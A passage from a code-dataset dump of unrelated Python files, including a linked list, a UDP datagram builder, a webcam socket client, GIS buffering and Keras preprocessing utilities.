__repr__(self):\n return '<WorkspaceString: %s>' % self.string\n\n def __str__(self):\n return '%s with %d letters, %d objects, %d bonds' % (\n self.string, len(self.letters), len(self.objects), len(self.bonds))\n\n def log(self, heading):\n s = '%s: %s - ' % (heading, self)\n for l in self.letters:\n s += ' %s' % l\n s += '; '\n for o in self.objects:\n s += ' %s' % o\n s += '; '\n for b in self.bonds:\n s += ' %s' % b\n s += '.'\n logging.info(s)\n\n def __len__(self):\n return len(self.string)\n\n def __getitem__(self, i):\n return self.string[i]\n\n def updateRelativeImportance(self):\n \"\"\"Update the normalised importance of all objects in the string\"\"\"\n total = sum([o.rawImportance for o in self.objects])\n if not total:\n for o in self.objects:\n o.relativeImportance = 0.0\n else:\n for o in self.objects:\n logging.info('object: %s, relative: %d = raw: %d / total: %d',\n o, o.relativeImportance * 1000, o.rawImportance,\n total)\n o.relativeImportance = o.rawImportance / total\n\n def updateIntraStringUnhappiness(self):\n if not len(self.objects):\n self.intraStringUnhappiness = 0.0\n return\n total = sum([o.intraStringUnhappiness for o in self.objects])\n self.intraStringUnhappiness = total / len(self.objects)\n\n def equivalentGroup(self, sought):\n from group import Group\n\n for objekt in self.objects:\n if isinstance(objekt, Group):\n if objekt.sameGroup(sought):\n return objekt\n return None\n","sub_path":"copycat/workspaceString.py","file_name":"workspaceString.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"209472560","text":"#suboptimal_structures_folder = 'RDS_barna_suboptimal_confs/'\nsuboptimal_structures_folder = 'PDS_barna_suboptimal_confs/'\n\n#fasta_file = '../../input/refined_dataset_FASTA.txt'\nfasta_file = '../../input/paper_dataset_FASTA.txt'\n\n#shape_profile_folder = 'RDS_SHAPE_data/barna_subopt/'\nshape_profile_folder = 'PDS_SHAPE_data/barna_subopt/'\n\ndef read_fasta_file(fasta_file_path):\n # open .fasta file\n with open(fasta_file_path, 'r') as fasta_file:\n fasta_file_content = fasta_file.readlines()\n #create a dictionary\n sequences = {}\n for line in fasta_file_content:\n line = line.rstrip()\n if line.startswith('>'):\n name = line[1:]\n sequences[name] = ''\n else:\n sequences[name] = line\n return sequences\n\ndef read_suboptimal_structures_file(path):\n structures = []\n with open(path, 'r') as structures_file:\n structures_file_content = structures_file.readlines()\n for line in structures_file_content:\n #print(line[0:-1])\n words = line[0:-1].split('\\t')\n #print(words[0])\n structures.append(words[0])\n return structures\n\n\nsequences = read_fasta_file(fasta_file)\nsequence_names = [name for name in sequences]\n\nex_names = ['PDB_00066.dp']\n\n#for name in ex_names:\nfor name in sequence_names:\n shape_profile = {}\n sequence = sequences[name]\n suboptimal_structures_path = suboptimal_structures_folder + name + '_configurations.txt'\n #print(suboptimal_structures_path)\n #print(read_suboptimal_structures_file(suboptimal_structures_path))\n structures = read_suboptimal_structures_file(suboptimal_structures_path)\n profile_path = shape_profile_folder + name + '_ann_shape.txt'\n #print(profile_path)\n for i in range(len(sequences[name])):\n score = sum(1 for structure in structures if structure[i] == '.') / len(structures)\n #print(i, score)\n shape_profile[i] = score\n if i == 0:\n with open(profile_path, 'w') as output_file:\n output_file.write(str(i + 1) + 
'\\t' + sequence[i] + '\\t' + str(score))\n else:\n with open(profile_path, 'a') as output_file:\n output_file.write('\\n' + str(i + 1) + '\\t' + sequence[i] + '\\t' + str(score))\n","sub_path":"utilities/new_vienna_with_shape/shape_profiles_from_barna_subopt.py","file_name":"shape_profiles_from_barna_subopt.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"460121645","text":"from .node import Node\r\nfrom .empty_exception import Empty\r\n\r\n\r\nclass DoublyLinkedList:\r\n def __init__(self):\r\n self._header = Node(None, None, None) \r\n self._trailer = Node(None, None, None) \r\n self._header._next = self._trailer \r\n self._trailer._prev = self._header \r\n self._size = 0 \r\n\r\n def __len__(self):\r\n return self._size\r\n\r\n def is_empty(self):\r\n return self._size == 0\r\n\r\n def first_node(self):\r\n if self.is_empty(): \r\n raise Empty(\"List is empty, it doesn't have first node!\")\r\n return self._header._next\r\n\r\n def last_node(self):\r\n if self.is_empty():\r\n raise Empty(\"List is empty, it doesn't have last node!\")\r\n return self._trailer._prev\r\n\r\n def first(self):\r\n try:\r\n return self.first_node()._element\r\n except Empty as e:\r\n print(e)\r\n\r\n def last(self):\r\n try:\r\n return self.last_node()._element\r\n except Empty as e:\r\n print(e)\r\n\r\n def add_first(self, e):\r\n new_node = Node(e, self._header, self._header._next) \r\n self._header._next._prev = new_node \r\n self._header._next = new_node \r\n self._size += 1 \r\n\r\n def add_last(self, e):\r\n new_node = Node(e, self._trailer._prev, self._trailer) \r\n self._trailer._prev._next = new_node \r\n self._trailer._prev = new_node \r\n self._size += 1\r\n\r\n def insert_between(self, e, predecessor, successor):\r\n newest = Node(e, predecessor, successor) \r\n predecessor._next = newest \r\n successor._prev = newest\r\n self._size += 1 \r\n return newest \r\n\r\n def delete_node(self, node):\r\n if self.is_empty(): \r\n raise Empty(\"It's impossible to remove an element. 
List is empty!\")\r\n predecessor = node._prev \r\n successor = node._next\r\n predecessor._next = successor\r\n successor._prev = predecessor\r\n self._size -= 1 \r\n element = node._element \r\n node._prev = node._next = node._element = None \r\n return element \r\n","sub_path":"Trees/queue_dll/doubly_linked_list/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"516458452","text":"import socket\nimport cv2\nimport numpy\nimport pickle\nimport time\nfrom threading import Timer,Thread,Event\n\nclass socket_client():\n\n def __init__(self , ip, port):\n \n self.ClientSocket = socket.socket()\n self.ClientSocket.connect((ip, port))\n \n def prepare_pic(self):\n \n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\n capture = cv2.VideoCapture(0)\n ret, frame = capture.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n result, frame = cv2.imencode('.jpg', frame, encode_param)\n data = pickle.dumps(frame, 0)\n size = str(len(data)).ljust(16).encode('utf-8')\n return (size , data)\n \n def send_image(self , data_tup):\n header = data_tup[0]\n print(header)\n data = data_tup[1]\n self.ClientSocket.send(header)\n self.ClientSocket.send(data)\n\n def repited_send(self , times):\n\n for i in range(0 , 15):\n\n self.send_image(self.prepare_pic())\n time.sleep(3)\n\n\n\n","sub_path":"Classes/clientClass.py","file_name":"clientClass.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31355517","text":"#!/usr/bin/python\r\n#coding : utf8\r\n__all__ = ['get']\r\nif __name__ != '__main__':\r\n def get(url,post=''):\r\n import urllib2,cookielib,urllib\r\n \r\n cookiefile = './cookies.txt'\r\n \r\n ckjar = cookielib.MozillaCookieJar(cookiefile)\r\n \r\n ckjar.load(cookiefile, ignore_discard=True, ignore_expires=True)\r\n \r\n req = urllib2.Request(url) \r\n \r\n req.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')\r\n req.add_header('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8') \r\n req.add_header('Accept-Encoding','gzip, deflate')\r\n req.add_header('Referer','http://i.youxinpai.com/TradeManage/tradelist.aspx')\r\n req.add_header('Host','i.youxinpai.com')\r\n req.add_header('Connection','keep-alive')\r\n req.add_header('Accept-Language','zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3')\r\n \r\n httpHandler = urllib2.HTTPHandler(debuglevel=0)\r\n opener = urllib2.build_opener(httpHandler,urllib2.HTTPCookieProcessor(ckjar) )\r\n \r\n urllib2.install_opener(opener)\r\n \r\n if post != '':\r\n data = urllib2.urlopen(url,urllib.urlencode(post)).read()\r\n else:\r\n data = urllib2.urlopen(url).read()\r\n ckjar.save('./cookies.txt',ignore_discard=True, ignore_expires=True) \r\n return data","sub_path":"crawl/myCurl.py","file_name":"myCurl.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"563335731","text":"#!/usr/bin/env python3\n\nfrom timfuz import Benchmark, loadc_Ads_bs, load_sub, Ads2bounds, corners2csv, corner_s2i\n\n\ndef gen_flat(fns_in, sub_json, corner=None):\n Ads, bs = loadc_Ads_bs(fns_in)\n bounds = Ads2bounds(Ads, bs)\n # Elements with zero delay assigned due to sub group\n group_zeros = set()\n # Elements with a concrete delay\n nonzeros = set()\n\n if corner:\n zero_row = [None, None, None, 
None]\n zero_row[corner_s2i[corner]] = 0\n else:\n zero_row = None\n\n for bound_name, bound_bs in bounds.items():\n sub = sub_json['subs'].get(bound_name, None)\n if bound_name in sub_json['zero_names']:\n if zero_row:\n yield bound_name, 0\n elif sub:\n #print('sub', sub)\n # put entire delay into pivot\n pivot = sub_json['pivots'][bound_name]\n assert pivot not in group_zeros\n nonzeros.add(pivot)\n non_pivot = set(sub.keys() - set([pivot]))\n #for name in non_pivot:\n # assert name not in nonzeros, (pivot, name, nonzeros)\n group_zeros.update(non_pivot)\n #print('yield PIVOT', pivot)\n yield pivot, bound_bs\n else:\n nonzeros.add(bound_name)\n yield bound_name, bound_bs\n # non-pivots can appear multiple times, but they should always be zero\n # however, due to substitution limitations, just warn\n violations = group_zeros.intersection(nonzeros)\n if len(violations):\n print('WARNING: %s non-0 non-pivot' % (len(violations)))\n\n # XXX: how to best handle these?\n # should they be fixed 0?\n if zero_row:\n # ZERO names should always be zero\n #print('ZEROs: %u' % len(sub_json['zero_names']))\n for zero in sub_json['zero_names']:\n #print('yield ZERO', zero)\n yield zero, zero_row\n\n real_zeros = group_zeros - violations\n print(\n 'Zero candidates: %u w/ %u non-pivot conflicts => %u zeros as solved'\n % (len(group_zeros), len(violations), len(real_zeros)))\n # Only yield elements not already yielded\n for zero in real_zeros:\n #print('yield solve-0', zero)\n yield zero, zero_row\n\n\ndef run(fns_in, fnout, sub_json, corner=None, verbose=False):\n with open(fnout, 'w') as fout:\n fout.write('ico,fast_max fast_min slow_max slow_min,rows...\\n')\n for name, corners in sorted(list(gen_flat(fns_in, sub_json,\n corner=corner))):\n row_ico = 1\n items = [str(row_ico), corners2csv(corners)]\n items.append('%u %s' % (1, name))\n fout.write(','.join(items) + '\\n')\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser(\n description='Substitute .csv to ungroup correlated variables')\n\n parser.add_argument('--verbose', action='store_true', help='')\n parser.add_argument('--sub-csv', help='')\n parser.add_argument(\n '--sub-json',\n required=True,\n help='Group substitutions to make fully ranked')\n parser.add_argument('--corner', default=None, help='')\n parser.add_argument('--out', default=None, help='output timing delay .csv')\n parser.add_argument(\n 'fns_in',\n nargs='+',\n help='input timing delay .csv (NOTE: must be single column)')\n args = parser.parse_args()\n # Store options in dict to ease passing through functions\n bench = Benchmark()\n\n sub_json = load_sub(args.sub_json)\n\n try:\n run(\n args.fns_in,\n args.out,\n sub_json=sub_json,\n verbose=args.verbose,\n corner=args.corner)\n finally:\n print('Exiting after %s' % bench)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fuzzers/007-timing/csv_group2flat.py","file_name":"csv_group2flat.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"194798310","text":"from osgeo import ogr, osr\n\n\n\nclass BufferMaker(object):\n\n def __init__(self):\n # EPSG:4326 : WGS84 lat/lon : http://spatialreference.org/ref/epsg/4326/\n self.wgs = osr.SpatialReference()\n self.wgs.ImportFromEPSG(4326)\n self.coord_trans_cache = {}\n\n\n def utm_zone(self, lat, lon):\n \"\"\"Args for osr.SpatialReference.SetUTM(int zone, int north = 1)\"\"\"\n return int(round(((float(lon) - 180) % 360)/6)), int(lat > 0)\n\n\n def add_buffer(self, 
original_lonlat_points, buffer_dist_km):\n\n lon1, lat1 = original_lonlat_points[0]\n\n # Get projections sorted out for that UTM zone\n cur_utm_zone = self.utm_zone(lat1, lon1)\n if cur_utm_zone in self.coord_trans_cache:\n self.wgs2utm, self.utm2wgs = self.coord_trans_cache[cur_utm_zone]\n else: # define new UTM Zone\n utm = osr.SpatialReference()\n utm.SetUTM(*cur_utm_zone)\n # Define spatial transformations to/from UTM and lat/lon\n self.wgs2utm = osr.CoordinateTransformation(self.wgs, utm)\n self.utm2wgs = osr.CoordinateTransformation(utm, self.wgs)\n self.coord_trans_cache[cur_utm_zone] = self.wgs2utm, self.utm2wgs\n\n ring = ogr.Geometry(ogr.wkbLinearRing)\n for (lon, lat) in original_lonlat_points:\n ring.AddPoint(lon, lat)\n poly = ogr.Geometry(ogr.wkbPolygon)\n poly.AddGeometry(ring)\n\n original_wkt = poly.ExportToWkt()\n\n # Project to UTM\n res = poly.Transform(self.wgs2utm)\n if res != 0:\n print(\"spatial transform failed with code \" + str(res))\n # print(original_wkt + \" -> \" + poly.ExportToWkt())\n #\n # print(\"Original area: \" + str(poly.GetArea()/1e6) + \" km^2\")\n\n\n # Compute a 15 km buffer\n buff = poly.Buffer(buffer_dist_km*1000)\n # print(\"Area: \" + str(buff.GetArea()/1e6) + \" km^2\")\n # Transform UTM buffer back to lat/long\n res = buff.Transform(self.utm2wgs)\n if res != 0:\n print(\"spatial transform failed with code \" + str(res))\n # print(\"Envelope: \" + str(buff.GetEnvelope()))\n # print(\"WKT: \" + buff.ExportToWkt())\n\n # print \"New polygon: \", buff\n\n buffer_coordinates = []\n for coord in self.get_coordinates(buff)[0]:\n buffer_coordinates.append((coord[0], coord[1]))\n\n return buffer_coordinates\n\n\n\n\n def get_coordinates(self, geometry):\n gtype = geometry.GetGeometryType()\n geom_count = geometry.GetGeometryCount()\n coordinates = []\n\n if gtype == ogr.wkbPoint or gtype == ogr.wkbPoint25D:\n return [geometry.GetX(0), geometry.GetY(0)]\n\n if gtype == ogr.wkbMultiPoint or gtype == ogr.wkbMultiPoint25D:\n geom_count = geometry.GetGeometryCount()\n for g in range(geom_count):\n geom = geometry.GetGeometryRef(g)\n coordinates.append(self.get_coordinates(geom))\n return coordinates\n\n if gtype == ogr.wkbLineString or gtype == ogr.wkbLineString25D:\n points = []\n point_count = geometry.GetPointCount()\n for i in range(point_count):\n points.append([geometry.GetX(i), geometry.GetY(i)])\n return points\n\n if gtype == ogr.wkbMultiLineString or gtype == ogr.wkbMultiLineString25D:\n coordinates = []\n geom_count = geometry.GetGeometryCount()\n for g in range(geom_count):\n geom = geometry.GetGeometryRef(g)\n coordinates.append(self.get_coordinates(geom))\n return coordinates\n\n if gtype == ogr.wkbPolygon or gtype == ogr.wkbPolygon25D:\n geom = geometry.GetGeometryRef(0)\n coordinates = self.get_coordinates(geom)\n return [coordinates]\n\n if gtype == ogr.wkbMultiPolygon or gtype == ogr.wkbMultiPolygon25D:\n\n coordinates = []\n geom_count = geometry.GetGeometryCount()\n for g in range(geom_count):\n geom = geometry.GetGeometryRef(g)\n coordinates.append(self.get_coordinates(geom))\n return coordinates\n\n\n\n# import simplekml\n# kml = simplekml.Kml()\n#\n#\n# def add_poly_to_kml(kml, name, lonlat_coordinates, color):\n# kml_poly = kml.newpolygon()\n# kml_poly.name = name\n#\n# print \"Exporting coordinates: \", lonlat_coordinates\n# # lonlat_coordinates.append(lonlat_coordinates[0])\n# kml_poly.outerboundaryis.coords = lonlat_coordinates\n# kml_poly.style.polystyle.color = simplekml.Color.changealphaint(100, color)\n#\n# 
kml_poly.description = name\n#\n#\n# bm = BufferMaker()\n#\n#\n# center_lat = 40\n# center_lon = -110\n# latitude_width = 1.0\n# longitude_width = 1.0\n# max_lat = center_lat + latitude_width/2\n# min_lat = center_lat - latitude_width/2\n# max_lon = center_lon + longitude_width/2\n# min_lon = center_lon - longitude_width/2\n#\n# box = [(min_lon, max_lat), (max_lon, max_lat), (max_lon, min_lat),\n# (min_lon, min_lat)]\n# box.append(box[0])\n# lons = [lon for lon, lat in box]\n# lats = [lat for lon, lat in box]\n#\n# print \"Box: \", box\n#\n#\n# add_poly_to_kml(kml, \"Original polygon\", box, simplekml.Color.blue)\n#\n# buffer_coordinates = bm.add_buffer(box, 25)\n# add_poly_to_kml(kml, \"Buffered_polygon\", buffer_coordinates,\n# simplekml.Color.red)\n#\n# kml.save(\"buffer_test2.kml\")\n#\n","sub_path":"buffer_maker.py","file_name":"buffer_maker.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"456968739","text":"# Time complexity: O(n^2)\r\n# Idea: keep several extra variables to hold intermediate values and test them; mind the details\r\nN, M = map(int, input().split()) # N: number of apple trees, M: number of fruit-thinning rounds\r\nApple = [[0 for i in range(M + 1)] for j in range(N)] # initialize the apple list\r\n# Apple[i][0] is the initial apple count of tree i; Apple[i][1..M] are the thinning amounts for tree i\r\nAppleCount = [0 for i in range(N)] # apples left on each tree after all thinning rounds\r\nCount = 0 # total apples left after thinning\r\nMax = 0 # largest number of apples thinned from a single tree\r\nMaxID = 0 # index of the tree with the most apples thinned\r\nfor i in range(N):\r\n Apple[i] = [int(n) for n in input().split()] # read one row of values into the list\r\n for j in range(M + 1):\r\n AppleCount[i] += Apple[i][j]\r\n Count += AppleCount[i] # this gives T (total apples)\r\n if Apple[i][0] - AppleCount[i] > Max:\r\n Max = Apple[i][0] - AppleCount[i] # this gives P (max thinned)\r\n MaxID = i # this gives K (tree number)\r\n elif Apple[i][0] - AppleCount[i] == Max and i < MaxID: # extra tie-break condition for K\r\n MaxID = i\r\n# output in the format required by the problem\r\nprint(str(Count) + \" \" + str(MaxID + 1) + \" \" + str(Max))\r\n","sub_path":"_20190901.py","file_name":"_20190901.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"83528033","text":"import os\nfrom PIL import Image\n\ndef create(size):\n image = Image.new(\"RGB\", (size, size), (255, 255, 255) )\n for x in range(size):\n for y in range(size):\n if x < y:\n image.putpixel((x,y), (0, 0, 0))\n return image\n\nimage = create(500)\nimage.show()\nimage.save(os.path.join(\"image\", \"black-white.jpg\"))\n","sub_path":"src/processamento-imagens/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"625669707","text":"class UDPSenderClass(object):\n # Constructor\n def __init__(self, i, sip, dip, sp=0, dp=0, dg=None):\n self.data = list(i)\n self.dataLength = len(self.data)\n self.UDPLength = 0\n self.sourceIP = list(sip.split('.'))\n self.destIP = list(dip.split('.'))\n self.sourcePort = int(sp)\n self.destPort = int(dp)\n self.datagram = dg\n self.binData = []\n self.bdi = 0\n self.checksum = 0\n self.csIP = ''\n self.cdIP = ''\n\n #Determining length of data and UDP header in bytes\n def setLength(self, header):\n self.UDPLength = self.dataLength + header\n\n #pads data if its not even\n def addPadding(self):\n if len(self.data) % 2 is 1:\n self.data.append(str(0))\n\n #Forming the pseudo header\n def addPseudoHeader(self):\n #Add Source IP address\n for i in xrange(0, len(self.sourceIP), 2):\n self.binData.append('{0:08b}'.format(int(self.sourceIP[i])))\n self.binData[self.bdi] += '{0:08b}'.format(int(self.sourceIP[i + 1]))\n 
self.bdi += 1\n #Add Destination IP address\n for i in xrange(0, len(self.destIP), 2):\n self.binData.append('{0:08b}'.format(int(self.destIP[i])))\n self.binData[self.bdi] += '{0:08b}'.format(int(self.destIP[i + 1]))\n self.bdi += 1\n\n #Add zeros, protocol value = 17 and UDP length\n self.binData.append('0000000000010001')\n self.binData.append('{0:016b}'.format(self.UDPLength))\n self.bdi += 2\n\n #Adds source and destination port numbers and length in binary\n def addUDPHeader(self):\n self.binData.append('{0:016b}'.format(self.sourcePort))\n self.binData.append('{0:016b}'.format(self.destPort))\n self.binData.append('{0:016b}'.format(self.UDPLength))\n self.bdi += 3\n\n #Concatenates binary Data for Checksum calculation\n def makeBinary(self):\n for i in xrange(0, len(self.data), 2):\n self.binData.append('{0:08b}'.format(ord(self.data[i])))\n self.binData[self.bdi] += '{0:08b}'.format(ord(self.data[i + 1]))\n self.bdi += 1\n\n #Converts Binary back into integers\n def convertStrings(self):\n for i in xrange(0, len(self.binData)):\n self.binData[i] = int(self.binData[i], 2)\n\n #Computes Checksum\n def checkSum(self):\n self.checksum = self.binData[0]\n for i in xrange(1, len(self.binData)):\n self.checksum += self.binData[i]\n # For carry. Cannot exceed 65535 for 16 bits\n if self.checksum > 65535:\n self.checksum = self.checksum - 65535\n self.checksum = self.checksum ^ 65535\n\n # Removes pseudoheader and inserts check sum value\n def createDatagram(self):\n for i in xrange(6):\n del self.binData[0]\n for i in xrange(2, len(self.binData)):\n self.binData[i] = self.changeEndian(self.binData[i])\n self.binData.insert(3, self.checksum)\n\n def changeEndian(self, bEnd):\n value = '{0:016b}'.format(bEnd)\n f, s = value[0:8], value[8:16]\n value = s + f\n return int(value, 2)\n\n #Writes binary file to output file passed in arguments\n def writeFile(self, fileName):\n file = open(fileName, 'wb')\n for i in xrange(len(self.binData) - 1):\n value = '{0:016b}'.format(self.binData[i])\n file.write(chr(int(value[0:8], 2)))\n file.write(chr(int(value[8:16], 2)))\n if len(self.data) % 2 is 1:\n value = '{0:016b}'.format(self.binData[-1])\n file.write(chr(int(value[0:8], 2)))\n else:\n value = '{0:016b}'.format(self.binData[-1])\n file.write(chr(int(value[0:8], 2)))\n file.write(chr(int(value[8:16], 2)))\n file.close()\n\n #Converts IP addresses to hex\n def conIPs(self):\n for i in xrange(len(self.sourceIP) - 1, -1, -1):\n temp = format(int(self.sourceIP[i]), '02x')\n self.csIP += temp\n temp = format(int(self.destIP[i]), '02x')\n self.cdIP += temp\n\n #Parent function. 
Calls all other functions\n def createUDP(self):\n self.setLength(8)\n self.addPadding()\n self.addPseudoHeader()\n self.addUDPHeader()\n self.makeBinary()\n self.convertStrings()\n self.checkSum()\n self.createDatagram()\n self.writeFile(self.datagram)\n self.conIPs()\n\n #To string method\n def __str__(self):\n return \"\\nBig-endian IP:\\n\\nSource IP: \" + self.csIP + \"\\nDestination IP: \" + \\\n self.cdIP + \"\\n\\nSource IP byte 1: \" + str(self.sourceIP[0]) + \"\\nSource IP byte 2: \" + \\\n str(self.sourceIP[1]) + \"\\nSource IP byte 3: \" + str(self.sourceIP[2]) + \"\\nSource IP byte 4: \" + \\\n str(self.sourceIP[3]) + \"\\nDestination IP byte 1: \" + str(self.destIP[0]) + \"\\nDestination IP byte 2: \" + \\\n str(self.destIP[1]) + \"\\nDestination IP byte 3: \" + str(self.destIP[2]) + \"\\nDestination IP byte 4: \" + \\\n str(self.destIP[3]) + \"\\n\\nSource port: \" + str(self.sourcePort) + \"\\nDestination port: \" + str(self.destPort) + \\\n \"\\n\\nfile size (Byte, without zero padding): \" + str(self.dataLength) + \"\\ntotal length(bytes): \" + \\\n str(self.UDPLength) + \"\\n\\nChecksum: \" + str(hex(self.checksum).lstrip(\"0x\")) + \\\n \"\\n\\nFile was successfully written to \" + self.datagram + \"\\n\"\n","sub_path":"UDPSenderClass.py","file_name":"UDPSenderClass.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"503177172","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy\nimport time\nimport random\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras import backend as K\n\nEMBEDDING_DIM = 300\nnumpy.random.seed(137)\n\n\ndef get_best_review_for_item(source='../dataset/best_review_for_item.txt'):\n item_to_review = {}\n for line in open(source, mode='r'):\n parts = line.strip().split('\\t')\n item_id = parts[0]\n review_id = parts[1]\n item_to_review[item_id] = review_id\n\n return item_to_review\n\n\ndef get_glove_embeddings():\n embeddings_index = {}\n for line in open('../dataset/glove.6B.300d.txt', mode='r'):\n values = line.strip().split()\n word = values[0]\n coefs = numpy.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n\n return embeddings_index\n\n\ndef get_item_factors(source ='../dataset/itemFactors.txt'):\n item_factors = {}\n for line in open(source, mode='r'):\n parts = line.strip().split(',')\n item_id_with_first_factor = parts[0]\n item_id = item_id_with_first_factor.split(':')[0]\n first_factor = numpy.asarray(item_id_with_first_factor.split(':')[1], dtype='float32')\n other_factors = numpy.asarray(parts[1:], dtype='float32')\n factors_for_item = numpy.append(first_factor, other_factors)\n item_factors[item_id] = factors_for_item\n\n return item_factors\n\n\ndef get_embeddings_and_sequences(source='../dataset/processed_reviews_text.txt'):\n start_time = time.time()\n\n item_factors = get_item_factors()\n review_texts = []\n review_factors = numpy.zeros((229901, 20), dtype='float32')\n reviews = []\n review_index = 0\n\n for line in open(source, mode='r'):\n parts = line.strip().split('\\t')\n item_id = parts[0]\n review_id = parts[1]\n\n reviews.append(review_id)\n\n review_factors[review_index] = item_factors[item_id]\n review_texts.append(' '.join(parts[2:]))\n\n review_index += 1\n\n tokenizer = Tokenizer(filters='')\n tokenizer.fit_on_texts(review_texts)\n review_sequences = pad_sequences(tokenizer.texts_to_sequences(review_texts))\n word_index 
= tokenizer.word_index\n\n glove_embeddings = get_glove_embeddings()\n\n embeddings_matrix = numpy.zeros((len(word_index)+1, EMBEDDING_DIM))\n for word, index in word_index.items():\n embedding_vector = glove_embeddings.get(word)\n if embedding_vector is not None:\n embeddings_matrix[index] = embedding_vector\n else:\n embeddings_matrix[index] = numpy.random.uniform(-0.25, 0.25, EMBEDDING_DIM)\n\n print('Dataset is read in memory for ' + str(time.time() - start_time) + ' seconds.')\n\n return embeddings_matrix, review_sequences, review_factors, reviews\n\n\n# splits the dataset in training, test and prediction set\n# so that for each item in the training set, 80% of it's reviews are in the training set, and the rest are in the test set.\ndef get_training_test_and_prediction_set(reviews_sequences, reviews_factors,reviews):\n start_time = time.time()\n\n train_set_x = []\n train_set_y = []\n test_set_x = []\n test_set_y = []\n prediction_set = []\n prediction_items = []\n\n training_set_content = [line.strip() for line in open('../dataset/training_set_with_review_id.txt', mode='r')]\n training_set_length = len(training_set_content)\n # random.shuffle(training_set_content)\n\n reviews_indexed = {reviews[i]: i for i in range(0, len(reviews))}\n\n for line in training_set_content:\n training_instance = line.split('\\t')\n review_id = training_instance[3]\n\n if review_id in reviews_indexed:\n index = reviews_indexed[review_id]\n sequence_for_review = reviews_sequences[index]\n factors_for_review = reviews_factors[index]\n\n if len(train_set_x) <= (0.9 * training_set_length):\n train_set_x.append(sequence_for_review)\n train_set_y.append(factors_for_review)\n else:\n test_set_x.append(sequence_for_review)\n test_set_y.append(factors_for_review)\n\n items_in_validation_set = set()\n best_reviews_for_items = get_best_review_for_item()\n\n for line in open('../dataset/test_set_whole.txt', mode='r'):\n validation_instance = line.strip().split('\\t')\n item_id = validation_instance[1]\n\n if item_id not in items_in_validation_set:\n best_review_for_item = best_reviews_for_items[item_id]\n review_index = reviews_indexed[best_review_for_item]\n sequence_for_review = reviews_sequences[review_index]\n prediction_set.append(sequence_for_review)\n prediction_items.append(item_id)\n\n items_in_validation_set.add(item_id)\n\n print('Dataset is split into training, test and prediction for ' + str(time.time() - start_time) + ' seconds.')\n\n return numpy.array(train_set_x), numpy.array(train_set_y), numpy.array(test_set_x), numpy.array(test_set_y), numpy.array(prediction_set),prediction_items\n\n\ndef get_prediction_set(prediction_indexes, reviews_sequences):\n sequences_to_predict = numpy.zeros(shape=(len(prediction_indexes), len(reviews_sequences[0])), dtype='int32')\n for i in range(0, len(prediction_indexes)):\n sequences_to_predict[i] = reviews_sequences[prediction_indexes[i]]\n\n return sequences_to_predict\n\n\ndef get_array_elements_as_string(arr):\n array_as_string = []\n for x in numpy.nditer(arr):\n array_as_string.append(str(x))\n\n return array_as_string\n\n\ndef write_factors_predictions(prediction_items, predictions, epoch):\n factor_predictions_output = open('output/factor_predictions_' + str(epoch) + '.txt', mode='w')\n for i in range(0, len(prediction_items)):\n\n predictions_for_item = predictions[i]\n factors_output = '\\t'.join(get_array_elements_as_string(predictions_for_item))\n\n item_id = prediction_items[i]\n\n factor_predictions_output.write(item_id + '\\t' + factors_output)\n 
factor_predictions_output.write('\\n')\n\n factor_predictions_output.flush()\n factor_predictions_output.close()\n\n\ndef RMSE(y_true, y_pred):\n return K.sqrt(K.mean(K.square(y_pred - y_true)))","sub_path":"convolutionalNeuralNetwork/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"325317689","text":"'''\nCreated on Jul 25, 2016\n\n@author: Sunny\n'''\nimport json\nimport sys\nimport texttable as tt\n\nclass cls_ReadJson:\n def __init__(self):\n pass\n def m_ReadJson(self,fileName):\n self.m_PrintInTable('json file',fileName)\n try:\n with open(fileName) as obj_json:\n json_data=obj_json.read()\n print('json raw file---------------------')\n print(json_data)\n json_dict=json.loads(json_data)\n print('json dictionary for Python---------------------')\n print(json_dict)\n return json_dict\n except Exception as e:\n print('Parsing Error in JSON file: ',fileName)\n print('ERROR: ',e)\n sys.exit('The program can not proceed further.')\n def m_PrintInTable(self,str_key,str_value):\n tab = tt.Texttable()\n #tab.set_deco(tab.HEADER)\n #tab.set_deco(2)\n tab.set_cols_width([50, 100])\n tab.set_cols_align(['l', 'l'])\n str_value=': '+str_value\n row=[str_key,str_value]\n tab.add_row(row)\n print(tab.draw())\n 